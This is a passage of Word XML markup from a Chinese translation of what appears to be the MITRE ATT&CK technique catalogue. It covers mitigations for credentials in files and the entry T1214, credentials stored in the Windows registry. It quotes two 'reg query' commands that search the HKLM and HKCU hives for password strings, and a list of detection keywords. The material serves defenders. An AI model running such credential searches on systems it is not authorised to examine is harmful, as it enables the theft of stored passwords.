      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="5756C6AB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C1BCE04" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId141" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11BB3E6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>建立禁止在文件中存储密码的组织策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="0A7E556D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37107D9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId142" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>文件和目录权限限制</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EAFD4AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将文件共享限制为特定目录，仅允许必要的用户访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="3E8A63B5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="381"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9FFE02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId143" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户培训</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E04A2D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保开发人员和系统管理员知道留在端点系统或服务器上的软件配置文件中使用明文密码的相关风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E1FFBE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0FD55E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567921B5" w14:textId="72BFE58F" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果一开始</w:t>
      </w:r>
      <w:r>
        <w:t>不知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>某些</w:t>
      </w:r>
      <w:r>
        <w:t>文件存在，那么检测攻击者对这些文件的访问可能很困难。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即便如此，</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到攻击者使用已获取的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:t>有可能的</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否有表示正在搜索密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑字词或正则表达式，例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更多信息，请参见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效帐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号”</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000EFD31" w14:textId="2E3D9F9D" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册表中</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>凭据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4EADE2D7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A13EB82" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1214</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493EC899" w14:textId="11CC433A" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A26C0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A17F9BA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r>
              <w:t>要求：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>能否查询</w:t>
            </w:r>
            <w:r w:rsidRPr="007B3506">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>某些注册表位置取决于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>他们</w:t>
            </w:r>
            <w:r w:rsidRPr="007B3506">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的访问级别。用户权限通常仅限于访</w:t>
            </w:r>
            <w:r w:rsidRPr="007B3506">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>问与用户相关的注册表项。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D42797" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r>
              <w:t>权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39FFAF96" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r>
              <w:t>，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FFDE44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>Sudhanshu Chauhan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>@Sudhanshu_C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FEA934" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FE43FB9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="003446E4" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726D9271" w14:textId="4C7A5427" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表存储系统或其他程序可以使用的配置信息。攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询注册表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储供其他程序或服务使用的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和密码。有时，这些</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于自动登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097EB2A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找密码信息相关的注册表项的命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00826DA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F259CAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>本地机器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>配置单元：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> reg query HKLM /f password /t REG_SZ /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F85A69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>单元：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>reg query HKCU /f password /t REG_SZ /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B14583" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00872AC7" w14:paraId="5BBE2CD4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="25C4847D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7F1B7756" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00872AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="002574A7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29CAB455" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId144" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>审核</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6074E942" w14:textId="423C3AE7" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主动搜索注册表中的</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。一旦</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>发现，请</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试降低风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="5B511053" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F8DED2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId145" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6188E1F3" w14:textId="4621FE28" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不要将</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>存储在注册表中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w14:paraId="58DF4A59" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FEC3351" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId146" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00CE1DFB">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33798B3C" w14:textId="67681D9F" w:rsidR="000F2665" w:rsidRPr="00CE1DFB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE1DFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果软件</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1DFB">
              <w:t>必须</w:t>
            </w:r>
